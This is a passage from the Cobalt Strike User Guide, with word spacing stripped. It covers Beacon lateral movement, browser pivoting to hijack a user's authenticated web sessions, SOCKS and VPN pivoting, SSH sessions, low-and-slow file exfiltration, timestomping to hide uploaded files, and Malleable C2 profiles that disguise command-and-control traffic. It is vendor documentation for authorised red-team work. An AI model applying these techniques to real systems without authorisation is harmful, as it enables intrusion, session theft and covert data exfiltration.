+Next,choosethelistenertouseforlateralmovement.TheSMBBeaconisusuallyagood
+candidatehere.
+Last,selectwhichsessionyouwanttoperformthelateralmovementattackfrom.Cobalt
+Strike’sasynchronousmodelofoffenserequireseachattacktoexecutefromacompromised
+system.
+ThereisnooptiontoperformthisattackwithoutaBeaconsessiontoattackfrom.Ifyou’reon
+aninternalengagement,considerhookingaWindowssystemthatyoucontrolandusethatas
+yourstartingpointtoattackothersystemswithcredentialsorhashes.
+PressLaunch.CobaltStrikewillactivatethetabfortheselectedBeaconandissuecommands
+toit.FeedbackfromtheattackwillshowupintheBeaconconsole.
+Beacon Data Store
+CobaltStrikeUserGuide www.fortra.com page:113
+
+PostExploitation/OtherCommands
+BeaconDataStoreenablesanoperatortostoreBeaconObjectFiles(BOFs)and.NET
+assembliesinBeacon'smemory.Thesestoreditemscansubsequentlybeexecutedmultiple
+timeswithoutresendingtheitem.TheCobaltStrikeclientautomaticallydetectswhetheran
+objecttobeexecutedisalreadystoredinthedatastore.Thestoredentriesaremaskedby
+default,andtheitemisunmaskedonlywhenitisused.
+InadditiontoBeaconObjectFilesand.NETassemblies,itispossibletostoregenericfilesinthe
+datastore,andthesefilescanbeaccessedfromwithinBOFs.Furtherdetailscanbefoundon
+theBOFCAPIpage.
+Thedefaultsizeofthedatastoreis16entries,butyoucanmodifythissizebyconfiguringthe
+data_store_sizeoptionwithinthestageblockofaC2profile.
+Thedata-store load [bof|dotnet|file] [file path]commandstoresaniteminthestore.
+Ifthenameargumentisnotprovided,thenthefilenameisused.
+Thedata-store unload [index]removesthestoreditem.
+Thedata-store listliststheitemscurrentlyavailableinthedatastore.
+Other Commands
+Beaconhasafewothercommandsnotcoveredabove.
+TheclearcommandwillclearBeacon'stasklist.Usethisifyoumakeamistake.
+TypeexittoaskBeacontoexit.
+Usekill [pid]toterminateaprocess.
+UsetimestomptomatchtheModified,Accessed,andCreatedtimesofonefiletothoseof
+anotherfile.
+CobaltStrikeUserGuide www.fortra.com page:114
+
+BrowserPivoting/Overview
+Browser Pivoting
+MalwarelikeZeusanditsvariantsinjectthemselvesintoauser’sbrowsertostealbanking
+information.Thisisaman-in-the-browserattack.So-called,becausetheattackerisinjecting
+malwareintothetarget’sbrowser.
+Overview
+Man-in-the-browsermalwareusestwoapproachestostealbankinginformation.Theyeither
+captureformdataasit’ssenttoaserver.Forexample,malwaremighthookPR_WriteinFirefox
+tointerceptHTTPPOSTdatasentbyFirefox.Or,theyinjectJavaScriptontocertainwebpages
+tomaketheuserthinkthesiteisrequestinginformationthattheattackerneeds.
+CobaltStrikeoffersathirdapproachforman-in-the-browserattacks.Itletstheattackerhijack
+authenticatedwebsessions—allofthem.Onceauserlogsontoasite,anattackermayaskthe
+user’sbrowsertomakerequestsontheirbehalf.Sincetheuser’sbrowserismakingtherequest,
+itwillautomaticallyre-authenticatetoanysitetheuserisalreadyloggedonto.Icallthisa
+browserpivot—becausetheattackerispivotingtheirbrowserthroughthecompromiseduser’s
+browser.
+figure61-BrowserPivotinginAction
+CobaltStrike’simplementationofbrowserpivotingforInternetExplorerinjectsanHTTPproxy
+serverintothecompromiseduser’sbrowser.Donotconfusethiswithchangingtheuser’sproxy
+settings.Thisproxyserverdoesnotaffecthowtheusergetstoasite.Rather,thisproxyserver
+isavailabletotheattacker.Allrequeststhatcomethroughitarefulfilledbytheuser’sbrowser.
+CobaltStrikeUserGuide www.fortra.com page:115
+
+BrowserPivoting/Setup
+Setup
+TosetupBrowserpivoting,goto[beacon] ->Explore ->Browser Pivot.ChoosetheInternet
+Explorerinstancethatyouwanttoinjectinto.Youmayalsodecidewhichporttobindthe
+browserpivotingproxyservertoaswell.
+figure62-StartaBrowserPivot
+Bewarethattheprocessyouinjectintomattersagreatdeal.InjectintoInternetExplorerto
+inheritauser’sauthenticatedwebsessions.ModernversionsofInternetExplorerspawneach
+tabinitsownprocess.IfyourtargetusesamodernversionofInternetExplorer,youmustinject
+aprocessassociatedwithanopentabtoinheritsessionstate.Whichtabprocessdoesn’t
+matter(childtabssharesessionstate).
+IdentifyInternetExplorertabprocessesbylookingatthePPIDvalueintheBrowserPivoting
+setupdialog.IfthePPIDreferencesexplorer.exe,theprocessisnotassociatedwithatab.Ifthe
+PPIDreferencesiexplore.exe,theprocessisassociatedwithatab.CobaltStrikewillshowa
+checkmarknexttotheprocessesitthinksyoushouldinjectinto.
+OnceBrowserPivotingissetup,setupyourwebbrowsertousetheBrowserPivotProxyserver.
+Remember,CobaltStrike’sBrowserPivotserverisanHTTPproxyserver.
+CobaltStrikeUserGuide www.fortra.com page:116
+
+BrowserPivoting/Use
+figure63-ConfigureBrowserSettings
+Use
+Youmaybrowsethewebasyourtargetuseroncebrowserpivotingisstarted.Bewarethatthe
+browserpivotingproxyserverwillpresentitsSSLcertificateforSSL-enabledwebsitesyouvisit.
+Thisisnecessaryforthetechnologytowork.
+Thebrowserpivotingproxyserverwillaskyoutoaddahosttoyourbrowser’struststorewhen
+itdetectsanSSLerror.AddthesehoststothetruststoreandpressrefreshtomakeSSL
+protectedsitesloadproperly.
+Ifyourbrowserpinsthecertificateofatargetsite,youmayfinditsimpossibletogetyour
+browsertoacceptthebrowserpivotingproxyserver’sSSLcertificate.Thisisapain.Oneoption
+istouseadifferentbrowser.TheopensourceChromiumbrowserhasacommand-lineoption
+toignoreallcertificateerrors.Thisisidealforbrowserpivotinguse:
+chromium --ignore-certificate-errors --proxy-server=[host]:[port]
+TheabovecommandisavailablefromView ->Proxy Pivots.HighlighttheBrowserPivotHTTP
+ProxyentryandpressTunnel.
+TostoptheBrowserPivotproxyserver,typebrowserpivot stop initsBeaconconsole.
+CobaltStrikeUserGuide www.fortra.com page:117
+
+BrowserPivoting/HowBrowserPivotingWorks
+Youwillneedtoreinjectthebrowserpivotproxyserveriftheuserclosesthetabyou’reworking
+from.TheBrowserPivottabwillwarnyouwhenitcan’tconnecttothebrowserpivotproxy
+serverinthebrowser.
+NOTE:
+OpenJDK11hasaTLSimplementationbugthatcausesERR_SSL_PROTOCOL_ERROR
+(Chrome/Chromium)andSSL_ERROR_RX_RECORD_TOO_LONG(Firefox)wheninteracting
+withhttps://sites.Ifyouencountertheseerrors--downgradeyourteamservertoOracle
+Java1.8orOpenJDK10.
+How Browser Pivoting Works
+InternetExplorerdelegatesallofitscommunicationtoalibrarycalledWinINet.Thislibrary,
+whichanyprogrammayuse,managescookies,SSLsessions,andserverauthenticationforits
+consumers.CobaltStrike’sBrowserPivotingtakesadvantageofthefactthatWinINet
+transparentlymanagesauthenticationandreauthenticationonaperprocessbasis.
+ByinjectingCobaltStrike’sBrowserPivotingtechnologyintoauser’sInternetExplorerinstance,
+yougetthistransparentreauthenticationforfree.
+CobaltStrikeUserGuide www.fortra.com page:118
+
+Pivoting/WhatisPivoting
+Pivoting
+What is Pivoting
+Pivoting,forthesakeofthismanual,isturningacompromisedsystemintoahoppointforother
+attacksandtools.CobaltStrike’sBeaconprovidesseveralpivotingoptions.Foreachofthese
+options,youwillwanttomakesureyourBeaconisininteractivemode.Interactivemodeis
+whenaBeaconchecksinmultipletimeseachsecond.Usethesleep 0 commandtoputyour
+Beaconintointeractivemode.
+SOCKS Proxy
+Goto[beacon] ->Pivoting ->SOCKS Server tosetupaSOCKS4orSOCKS5proxyserveron
+yourteamserver.Or,usesocks 8080 tosetupaSOCKSproxyserveronport8080(oranyother
+portyouchoose).
+AllconnectionsthatgothroughtheseSOCKSserversturnintoconnect,read,write,andclose
+tasksfortheassociatedBeacontoexecute.YoumaytunnelviaSOCKSthroughanytypeof
+Beacon(evenanSMBBeacon).
+Beacon’sHTTPdatachannelisthemostresponsiveforpivotingpurposes.Ifyou’dliketopivot
+trafficoverDNS,usetheDNSTXTrecordcommunicationmode.
+Usesocks [port] [socks4 | socks5] [enableNoAuth | disableNoAuth] [user] [password]
+[enableLogging | disableLogging]tostartaSOCKS4a(bydefaultwhennoserverversionis
+specified)orSOCKS5serveronthespecifiedport.Thisserverwillrelayconnectionsthrough
+thisBeacon.
+SOCKS5serverscanbeconfiguredwithNoAuthauthentication(default),User/Password
+authentication,andsomeadditionallogging.
+SOCKS5ServerscurrentlydonotsupportGSSAPIauthenticationandIPV6.
+ToseetheSOCKSserversthatarecurrentlysetup,gotoView ->Proxy Pivots.
+Usesocks stoptostoptheSOCKSserversandterminateexistingconnections.
+TrafficwillnotrelaywhileBeaconisasleep.Changethesleeptimewiththesleepcommandto
+reducelatency.
+Proxychains
+CobaltStrikeUserGuide www.fortra.com page:119
+
+Pivoting/ReversePortForward
+TheproxychainstoolwillforceanexternalprogramtouseaSOCKSproxyserverthatyou
+designate.Youmayuseproxychainstoforcethird-partytoolsthroughCobaltStrike’sSOCKS
+server.Tolearnmoreaboutproxychains,visit:http://proxychains.sourceforge.net/
+Metasploit
+YoumayalsotunnelMetasploitFrameworkexploitsandmodulesthroughBeacon.Createa
+BeaconSOCKSproxyserver[asdescribedabove]andpastethefollowingintoyourMetasploit
+Frameworkconsole:
+setg Proxies socks4:team server IP:proxy port
+setg ReverseAllowProxy true
+ThesecommandswillinstructtheMetasploitFrameworktoapplyyourProxiesoptiontoall
+modulesexecutedfromthispointforward.Onceyou’redonepivotingthroughBeaconinthis
+way,useunsetg Proxies tostopthisbehavior.
+Ifyoufindtheabovetoughtoremember,gotoView ->Proxy Pivots.Highlighttheproxypivot
+yousetupandpressTunnel.ThisbuttonwillprovidethesetgProxiessyntaxneededtotunnel
+theMetasploitFrameworkthroughyourBeacon.
+Reverse Port Forward
+Thefollowingcommandsareavailable:
+NOTE:
+Typehelp intheBeaconconsoletoseeavailablecommands.Typehelp followedbya
+commandnametoseedetailedhelp.
+rportfwd-UsethiscommandtosetupareversepivotthroughBeacon.Therportfwdcommand
+willbindaportonthecompromisedtarget.Anyconnectionstothisportwillcauseyour
+CobaltStrikeservertoinitiateaconnectiontoanotherhostandportandrelaytraffic
+betweenthesetwoconnections.CobaltStriketunnelsthistrafficthroughBeacon.
+Thesyntaxforrportfwdis:rportfwd [bind port] [forward host] [forward port].
+rportfwd_local-UsethiscommandtosetupareversepivotthroughBeaconwithonevariation.
+Thisfeatureinitiatesaconnectiontotheforwardhost/portfromyourCobaltStrikeclient.
+TheforwardedtrafficiscommunicatedthroughtheconnectionyourCobaltStrikeclient
+hastoitsteamserver.
+rportfwd stop [bind port]-Usetodisablethereverseportforward.
+CobaltStrikeUserGuide www.fortra.com page:120
+
+Pivoting/SpawnandTunnel
+Spawn and Tunnel
+Usethespunnelcommandtospawnathird-partytoolinatemporaryprocessandcreatea
+reverseportforwardforit.Thesyntaxisspunnel [x86 or x64] [controller host] [controller
+port] [/path/to/agent.bin].Thiscommandexpectsthattheagentfileisposition-independent
+shellcode(usuallytherawoutputfromanotheroffenseplatform).Thespunnel_localcommand
+isthesameasspunnel,exceptitinitiatesthecontrollerconnectionfromyourCobaltStrike
+client.Thespunnel_localtrafficiscommunicatedthroughtheconnectionyourCobaltStrike
+clienthastoitsteamserver.
+Agent Deployed:Interoperability with Core Impact
+ThespunnelcommandsweredesignedspecificallytotunnelCoreImpact'sagentthrough
+CobaltStrike'sBeacon.CoreImpactisapenetrationtestingtoolandexploitframeworkalso
+availableforlicensefromFortraathttps://www.coresecurity.com/products/core-impact
+ToexportarawagentfilefromCoreImpact:
+1. ClicktheModules tabintheCoreImpactuserinterface
+2. SearchforPackage and Register Agent
+3. Double-clickthismodule
+4. ChangePlatform toWindows
+5. ChangeArchitecture tox86-64
+6. ChangeBinary Type toraw
+7. ClickTarget File andpress...todecidewheretosavetheoutput.
+8. GotoAdvanced
+9. ChangeEncrypt Code tofalse
+10. GotoAgent Connection
+11. ChangeConnection Method toConnectfrom Target
+12. ChangeConnect Back Hostname to127.0.0.1
+13. ChangePort tosomevalue(e.g.,9000)andrememberit.
+14. PressOK.
+TheabovewillgenerateaCoreImpactagentasarawfile.Youmayusespunnelx64orspunnel_
+localx64torunthisagentandtunnelitbacktoCoreImpact.
+WeoftenuseCobaltStrikeonaninternetreachableinfrastructureandCoreImpactisoftenona
+localWindowsvirtualmachine.It'sforthisreasonwehavespunnel_local.Werecommendthat
+yourunaCobaltStrikeclientfromthesameWindowssystemthatCoreImpactisinstalledonto.
+CobaltStrikeUserGuide www.fortra.com page:121
+
+Pivoting/PivotListeners
+Inthissetup,youcanrunspunnel_local x64 127.0.0.1 9000 c:\path\to\agent.bin.Oncethe
+connectionismade,youwillhearthefamous"AgentDeployed"wavfile.
+WithanImpactagentontarget,youhavetoolstoescalateprivileges,scanandinformation
+gatherviamanymodules,launchremoteexploits,andchainotherImpactagentsthroughyour
+Beaconconnection.
+Pivot Listeners
+It’sgoodtradecrafttolimitthenumberofdirectconnectionsfromyourtarget’snetworktoyour
+commandandcontrolinfrastructure.Apivotlistenerallowsyoutocreatealistenerthatis
+boundtoaBeaconorSSHsession.Inthisway,youcancreatenewreversesessionswithout
+moredirectconnectionstoyourcommandandcontrolinfrastructure.
+Tosetupapivotlistener,goto[beacon] ->Pivoting ->Listener….Thiswillopenadialogwhere
+youmaydefineanewpivotlistener.
+figure64-ConfigureaPivotListener
+ApivotlistenerwillbindtoListenPortonthespecifiedSession.TheListenHostvalueconfigures
+theaddressyourreverseTCPpayloadwillusetoconnecttothislistener.
+Rightnow,theonlypayloadoptioniswindows/beacon_reverse_tcp.Thisisalistenerwithouta
+stager.Thismeansyoucan’tembedthispayloadintocommandsandautomationthatexpect
+stagers.Youdohavetheoptiontoexportastagelesspayloadartifactandrunittodelivera
+reverseTCPpayload.
+CobaltStrikeUserGuide www.fortra.com page:122
+
+Pivoting/CovertVPN
+PivotListenersdonotchangethepivothost’sfirewallconfiguration.Ifapivothosthasahost-
+basedfirewall,thismayinterferewithyourlistener.You,theoperator,areresponsiblefor
+anticipatingthissituationandtakingtherightstepsforit.
+Toremoveapivotlistener,gotoCobalt Strike ->Listeners andremovethelistenerthere.
+CobaltStrikewillsendatasktoteardownthelisteningsocket,ifthesessionisstillreachable.
+Covert VPN
+VPNpivotingisaflexiblewaytotunneltrafficwithoutthelimitationsofaproxypivot.Cobalt
+StrikeoffersVPNpivotingthroughitsCovertVPNfeature.CovertVPNcreatesanetwork
+interfaceontheCobaltStrikesystemandbridgesthisinterfaceintothetarget’snetwork.
+How to Deploy
+ToactivateCovertVPN,right-clickacompromisedhost,goto[beacon] ->Pivoting ->Deploy
+VPN.SelecttheremoteinterfaceyouwouldlikeCovertVPNtobindto.Ifnolocalinterfaceis
+present,pressAdd tocreateone.
+figure65-DeployCovertVPN
+CheckClone host MAC addresstomakeyourlocalinterfacehavethesameMACaddressas
+theremoteinterface.It’ssafesttoleavethisoptionchecked.
+PressDeploy tostarttheCovertVPNclientonthetarget.CovertVPNrequiresAdministrator
+accesstodeploy.
+OnceaCovertVPNinterfaceisactive,youmayuseitlikeanyphysicalinterfaceonyoursystem.
+UseifconfigtoconfigureitsIPaddress.IfyourtargetnetworkhasaDHCPserver,youmay
+requestanIPaddressfromitusingyouroperatingsystemsbuilt-intools.
+CobaltStrikeUserGuide www.fortra.com page:123
+
+Pivoting/CovertVPN
+Manage Interfaces
+TomanageyourCovertVPNinterfaces,gotoCobalt Strike ->VPN Interfaces.Here,Cobalt
+StrikewillshowtheCovertVPNinterfaces,howthey’reconfigured,andhowmanybyteswere
+transmittedandreceivedthrougheachinterface.
+HighlightaninterfaceandpressRemove todestroytheinterfaceandclosetheremoteCovert
+VPNclient.CovertVPNwillremoveitstemporaryfilesonrebootanditautomaticallyundoes
+anysystemchangesrightaway.
+PressAdd toconfigureanewCovertVPNinterface.
+figure66-SetupaCovertVPNInterface
+Configure an Interface
+CovertVPNinterfacesconsistofanetworktapandachanneltocommunicateethernetframes
+through.Toconfiguretheinterface,chooseanInterfacename(thisiswhatyouwillmanipulate
+throughifconfiglater)andaMACaddress.
+YoumustalsoconfiguretheCovertVPNcommunicationchannelforyourinterface.CovertVPN
+maycommunicateEthernetframesoveraUDPconnection,TCPconnection,ICMP,orusingthe
+HTTPprotocol.TheTCP(Reverse)channelhasthetargetconnecttoyourCobaltStrike
+instance.TheTCP(Bind)channelhasCobaltStriketunneltheVPNthroughBeacon.
+CobaltStrikewillsetupandmanagecommunicationwiththeCovertVPNclientbasedonthe
+LocalPortandChannelyouselect.
+TheCovertVPNHTTPchannelmakesuseoftheCobaltStrikewebserver.Youmayhostother
+CobaltStrikewebapplicationsandmultipleCovertVPNHTTPchannelsonthesameport.
+CobaltStrikeUserGuide www.fortra.com page:124
+
+Pivoting/CovertVPN
+Forbestperformance,usetheUDPchannel.TheUDPchannelhastheleastamountof
+overheadcomparedtotheTCPandHTTPchannels.UsetheICMP,HTTP,orTCP(Bind)
+channelsifyouneedtogetpastarestrictivefirewall.
+WhileCovertVPNhasaflexibilityadvantage,youruseofaVPNpivotoveraproxypivotwill
+dependonthesituation.CovertVPNrequiresAdministratoraccess.Aproxypivotdoesnot.
+CovertVPNcreatesanewcommunicationchannel.Aproxypivotdoesnot.Youshouldusea
+proxypivotinitiallyandmovetoaVPNpivotwhenit’sneeded.
+CobaltStrikeUserGuide www.fortra.com page:125
+
+SSHSessions/TheSSHClient
+SSH Sessions
+The SSH Client
+CobaltStrikecontrolsUNIXtargetswithabuilt-inSSHclient.ThisSSHclientreceivestasks
+fromandroutesitsoutputthroughaparentBeacon.
+Right-clickatargetandgotoLogin -> sshtoauthenticatewithausernameandpassword.Go
+toLogin -> ssh (key)toauthenticatewithakey.
+FromaBeaconconsole,usessh [pid] [arch] [target] [user] [password]toinjectintothe
+specifiedprocesstorunanSSHclientandattempttologintothespecifiedtarget.Usessh
+[target] [user] [password] (without[pid]and[arch]arguments)tospawnatemporaryprocess
+torunanSSHclientandattempttologintothespecifiedtarget.
+Youmayalsousessh-key [pid] [arch] [target:port] [user] [/path/to/key.pem]toinjectintothe
+specifiedprocesstorunanSSHclientandattempttologintothespecifiedtarget.Usessh-key
+[target:port] [user] [/path/to/key.pem](without[pid]and[arch]arguments)tospawna
+temporaryprocesstorunanSSHclientandattempttologintothespecifiedtarget.
+NOTE:
+ThekeyfileneedstobeinthePEMformat.IfthefileisnotinthePEMformatthenmakea
+copyofthefileandconvertthecopywiththefollowingcommand:/usr/bin/ssh-keygen -f
+[/path/to/copy] -e -m pem -p.
+ThesecommandsrunCobaltStrike’sSSHclient.Theclientwillreportanyconnectionor
+authenticationissuestotheparentBeacon.Iftheconnectionsucceeds,youwillseeanew
+sessioninCobaltStrike’sdisplay.ThisisanSSHsession.Right-clickonthissessionandpress
+Interact toopentheSSHconsole.
+Typehelp toseealistofcommandstheSSHsessionsupports.Typehelpfollowedbya
+commandnamefordetailsonthatcommand.
+Running Commands
+Theshell commandwillrunthecommandandargumentsyouprovide.Runningcommands
+blocktheSSHsessionforupto20sbeforeCobaltStrikeputsthecommandinthebackground.
+CobaltStrikewillreportoutputfromtheselongrunningcommandsasitbecomesavailable.
+Usesudo [password] [command + arguments] toattempttorunacommandviasudo.This
+aliasrequiresthetarget’ssudotoacceptthe–Sflag.
+CobaltStrikeUserGuide www.fortra.com page:126
+
+SSHSessions/UploadandDownloadFiles
+Thecd commandwillchangethecurrentworkingdirectoryfortheSSHsession.Thepwd
+commandreportsthecurrentworkingdirectory.
+Upload and Download Files
+Thefollowingcommandsareavailable:
+NOTE:
+Typehelp intheBeaconconsoletoseeavailablecommands.Typehelp followedbya
+commandnametoseedetailedhelp.
+download-Thiscommanddownloadstherequestedfile.Youdonotneedtoprovidequotes
+aroundafilenamewithspacesinit.Beaconisbuiltforlowandslowexfiltrationofdata.
+Duringeachcheck-in,Beaconwilldownloadafixedchunkofeachfileitstaskedtoget.
+ThesizeofthischunkdependsonBeacon’scurrentdatachannel.TheHTTPandHTTPS
+channelspulldatain512KBchunks.
+downloads-UsetoseealistoffiledownloadsinprogressforthecurrentBeacon.
+cancel-Issuethiscommand,followedbyafilename,tocanceladownloadthat’sinprogress.
+Youmayusewildcardswithyourcancelcommandtocancelmultiplefiledownloadsat
+once.
+upload-Thiscommanduploadsafiletothehost.
+timestomp-Whenyouuploadafile,youwillsometimeswanttoupdateitstimestampsto
+makeitblendinwithotherfilesinthesamefolder.Thiscommandwilldothis.The
+timestompcommandmatchestheModified,Accessed,andCreatedtimesofonefileto
+anotherfile.
+GotoView->DownloadsinCobaltStriketoseethefilesthatyourteamhasdownloadedsofar.
+Onlycompleteddownloadsshowupinthistab.
+Downloadedfilesarestoredontheteamserver.Tobringfilesbacktoyoursystem,highlight
+themhere,andpressSync Files.CobaltStrikethendownloadstheselectedfilestoafolderof
+yourchoosingonyoursystem.
+Peer-to-peer C2
+SSHsessionscancontrolTCPBeacons.Usetheconnect commandtoassumecontrolofa
+TCPBeaconwaitingforaconnection.Useunlink todisconnectaTCPBeaconsession.
+CobaltStrikeUserGuide www.fortra.com page:127
+
+SSHSessions/SOCKSPivotingandReversePortForwards
+Goto[session] ->Listeners ->Pivot Listener… tosetupapivotlistenertiedtothisSSH
+session.ThiswillallowthiscompromisedUNIXtargettoreceivereverseTCPBeaconsessions.
+ThisoptiondoesrequirethattheSSHdaemon’sGatewayPortsoptionissettoyesor
+ClientSpecified.
+SOCKS Pivoting and Reverse Port Forwards
+Thefollowingcommandsareavailable:
+NOTE:
+Typehelp intheBeaconconsoletoseeavailablecommands.Typehelp followedbya
+commandnametoseedetailedhelp.
+socks-UsethiscommandtocreateaSOCKSserveronyourteamserverthatforwardstraffic
+throughtheSSHsession.Therportfwd commandwillalsocreateareverseportforward
+thatroutestrafficthroughtheSSHsessionandyourBeaconchain.
+Thereisonecaveattorportfwd:therportfwdcommandaskstheSSHdaemontobindtoall
+interfaces.It’squitelikelytheSSHdaemonwilloverridethisandforcetheporttobindto
+localhost.YouneedtochangetheGatewayPortsoptionfortheSSHdaemontoyesor
+clientspecified.
+CobaltStrikeUserGuide www.fortra.com page:128
+
+MalleableCommandandControl/Overview
+Malleable Command and Control
+Overview
+Beacon'sHTTPindicatorsarecontrolledbyaMalleableCommandandControl(MalleableC2)
+profile.AMalleableC2profileisasimpleprogramthatspecifieshowtotransformdataand
+storeitinatransaction.Thesameprofilethattransformsandstoresdata,interpreted
+backwards,alsoextractsandrecoversdatafromatransaction.
+Touseacustomprofile,youmuststartaCobaltStriketeamserverandspecifyyourprofileat
+thattime.
+./teamserver [external IP] [password] [/path/to/my.profile]
+YoumayonlyloadoneprofileperCobaltStrikeinstance.
+Viewing the Loaded Profile
+ToviewtheC2profilethatwasloadedwhentheTeamServerwasstartedselectHelp \
+Malleable C2 Profileonthemenu.Thisdisplaystheprofileforthecurrentlyselected
+TeamServerwhenmultipleTeamServersareconnected.Thedialogisread-only.
+Toclosethedialogusethe'x'intheupperrightcornerofthedialog.
+TIP:
+ThissectioncoverstheMalleableC2featuresrelatedtoflexiblenetworkcommunications.
+SeeMalleable PE, Process Injection, and Post Exploitation on page 151forinformation
+onMalleableC2'sstage,process-inject,andpost-exblocks.
+Checking for Errors
+CobaltStrike’sLinuxpackageincludesac2lint program.Thisprogramwillcheckthesyntaxofa
+communicationprofile,applyafewextrachecks,andevenunittestyourprofilewithrandom
+data.It’shighlyrecommendedthatyoucheckyourprofileswiththistoolbeforeyouloadthem
+intoCobaltStrike.
+./c2lint [/path/to/my.profile]
+c2lintreturnsandlogsthefollowingresultcodesforthespecifiedprofilefile:
+CobaltStrikeUserGuide www.fortra.com page:129
+
+MalleableCommandandControl/ProfileLanguage
+l Aresultof0isreturnedifc2lintcompleteswithnoerrors
+l Aresultof1isreturnedifc2lintcompleteswithonlywarnings
+l Aresultof2isreturnedifc2lintcompleteswithonlyerrors
+l Aresultof3isreturnedifc2lintcompleteswithbotherrorsandwarnings.
+Thelastlinesofthec2lintoutputdisplayacountofdetectederrorsandwarnings.Nomessage
+isdisplayedifnonearefound.Therecanbemoreerrormessagesdisplayedintheoutputthan
+thecountrepresentsbecauseasingleerrormayproducemorethan1errormessage.Thisis
+thesamepossibilityforwarningshoweverlesslikely.Forexample:
+l [!]Detected1warning.
+l [-]Detected3errors.
+Profile Language
+Thebestwaytocreateaprofileistomodifyanexistingone.Severalexampleprofilesare
+availableonGithub:https://github.com/cobalt-strike/Malleable-C2-Profiles
+Whenyouopenaprofile,hereiswhatyouwillsee:
+# this is a comment
+set global_option "value";
+protocol-transaction {
+set local_option "value";
+client {
+# customize client indicators
+}
+server {
+# customize server indicators
+}
+}
+Commentsbeginwitha#andgountiltheendoftheline.Thesetstatementisawaytoassigna
+valuetoanoption.Profilesuse{ curlybraces}togroupstatementsandinformationtogether.
+Statementsalwaysendwithasemi-colon.
+Tohelpallofthismakesense,here’sapartialprofile:
+http-get {
+set uri "/foobar";
+CobaltStrikeUserGuide www.fortra.com page:130
+
+MalleableCommandandControl/ProfileLanguage
+client {
+metadata {
+base64;
+prepend "user=";
+header "Cookie";
+}
+}
+ThispartialprofiledefinesindicatorsforanHTTPGETtransaction.Thefirststatement,seturi,
+assignstheURIthattheclientandserverwillreferenceduringthistransaction.Thisset
+statementoccursoutsideoftheclientandservercodeblocksbecauseitappliestobothof
+them.
+TheclientblockdefinesindicatorsfortheclientthatperformsanHTTPGET.Theclient,inthis
+case,isCobaltStrike’sBeaconpayload.
+WhenCobaltStrike’sBeacon“phoneshome”itsendsmetadataaboutitselftoCobaltStrike.In
+thisprofile,wehavetodefinehowthismetadataisencodedandsentwithourHTTPGET
+request.
+Themetadatakeywordfollowedbyagroupofstatementsspecifieshowtotransformand
+embedmetadataintoourHTTPGETrequest.Thegroupofstatements,followingthemetadata
+keyword,iscalledadatatransform.
+Step Action Data
+0. Start metadata
+1. base64 Base64Encode bWV0YWRhdGE=
+2. prepend"user=" PrependString user=bWV0YWRhdGE=
+3. header"Cookie" StoreinTransaction
+Thefirststatementinourdatatransformstatesthatwewillbase64encodeourmetadata[1].
+Thesecondstatement,prepend,takesourencodedmetadataandprependsthestringuser=to
+it[2].Nowourtransformedmetadatais“user=“ .base64(metadata).Thethirdstatementstates
+wewillstoreourtransformedmetadataintoaclientHTTPheadercalledCookie[3].That’sit.
+BothBeaconanditsserverconsumeprofiles.Here,we’vereadtheprofilefromtheperspective
+oftheBeaconclient.TheBeaconserverwilltakethissameinformationandinterpretit
+backwards.Let’ssayourCobaltStrikewebserverreceivesaGETrequesttotheURI/foobar.
+Now,itwantstoextractmetadatafromthetransaction.
+Step Action Data
+0. Start
+CobaltStrikeUserGuide www.fortra.com page:131
+
+MalleableCommandandControl/ProfileLanguage
+Step Action Data
+1. header"Cookie" RecoverfromTransaction user=bWV0YWRhdGE=
+2. prepend"user=" Removefirst5characters bWV0YWRhdGE=
+3. base64 Base64Decode metadata
+Theheaderstatementwilltellourserverwheretorecoverourtransformedmetadatafrom[1].
+TheHTTPservertakescaretoparseheadersfromtheHTTPclientforus.Next,weneedtodeal
+withtheprependstatement.Torecovertransformeddata,weinterpretprependasremovethe
+firstXcharacters[2],whereXisthelengthoftheoriginalstringweprepended.Now,allthat’sleft
+istointerpretthelaststatement,base64.Weusedabase64encodefunctiontotransformthe
+metadatabefore.Now,weuseabase64decodetorecoverthemetadata[3].
+Wewillhavetheoriginalmetadataoncetheprofileinterpreterfinishesexecutingeachofthese
+inversestatements.
+Data Transform Language
+Adatatransformisasequenceofstatementsthattransformandtransmitdata.Thedata
+transformstatementsare:
+Statement Action Inverse
+append"string" Append"string" RemovelastLEN(“string”)characters
+base64 Base64Encode Base64Decode
+base64url URL-safeBase64Encode URL-safeBase64Decode
+mask XOR maskw/randomkey XOR maskw/samerandomkey
+netbios NetBIOSEncode‘a’ NetBIOSDecode‘a’
+netbiosu NetBIOSEncode‘A’ NetBIOSDecode‘A’
+prepend"string" Prepend"string" RemovefirstLEN(“string”)characters
+Adatatransformisacombinationofanynumberofthesestatements,inanyorder.For
+example,youmaychoosetonetbiosencodethedatatotransmit,prependsomeinformation,
+andthenbase64encodethewholepackage.
+Adatatransformalwaysendswithaterminationstatement.Youmayonlyuseonetermination
+statementinatransform.ThisstatementtellsBeaconanditsserverwhereinthetransactionto
+storethetransformeddata.
+Therearefourterminationstatements.
+CobaltStrikeUserGuide www.fortra.com page:132
+
+MalleableCommandandControl/ProfileLanguage
+Statement What
+header“header” StoredatainanHTTPheader
+parameter“key” StoredatainaURIparameter
+print Senddataastransactionbody
+uri-append AppendtoURI
+TheheaderterminationstatementstorestransformeddatainanHTTPheader.Theparameter
+terminationstatementstorestransformeddatainanHTTPparameter.Thisparameteris
+alwayssentaspartofURI.Theprintstatementsendstransformeddatainthebodyofthe
+transaction.
+Theprintstatementistheexpectedterminationstatementforthehttp-get.server.output,http-
+post.server.output,andhttp-stager.server.outputblocks.Youmayusetheheader,parameter,
+printanduri-appendterminationstatementsfortheotherblocks.
+Ifyouuseaheader,parameter,oruri-appendterminationstatementonhttp-post.client.output,
+Beaconwillchunkitsresponsestoareasonablelengthtofitintothispartofthetransaction.
+Theseblocksandthedatatheysendaredescribedinalatersection.
+Strings
+Beacon’sProfileLanguageallowsyoutouse“strings”inseveralplaces.Ingeneral,stringsare
+interpretedas-is.However,thereareafewspecialvaluesthatyoumayuseinastring:
+Value Special Value
+“\n” Newlinecharacter
+“\r” CarriageReturn
+“\t” Tabcharacter
+“\u####” Aunicodecharacter
+“\x##” Abyte(e.g.,\x41=‘A’)
+“\\” \
+Headers and Parameters
+Datatransformsareanimportantpartoftheindicatorcustomizationprocess.Theyallowyou
+todressupdatathatBeaconmustsendorreceivewitheachtransaction.Youmayadd
+extraneousindicatorstoeachtransactiontoo.
+CobaltStrikeUserGuide www.fortra.com page:133
+
+MalleableCommandandControl/ProfileLanguage
+InanHTTPGETorPOSTrequest,theseextraneousindicatorscomeintheformofheadersor
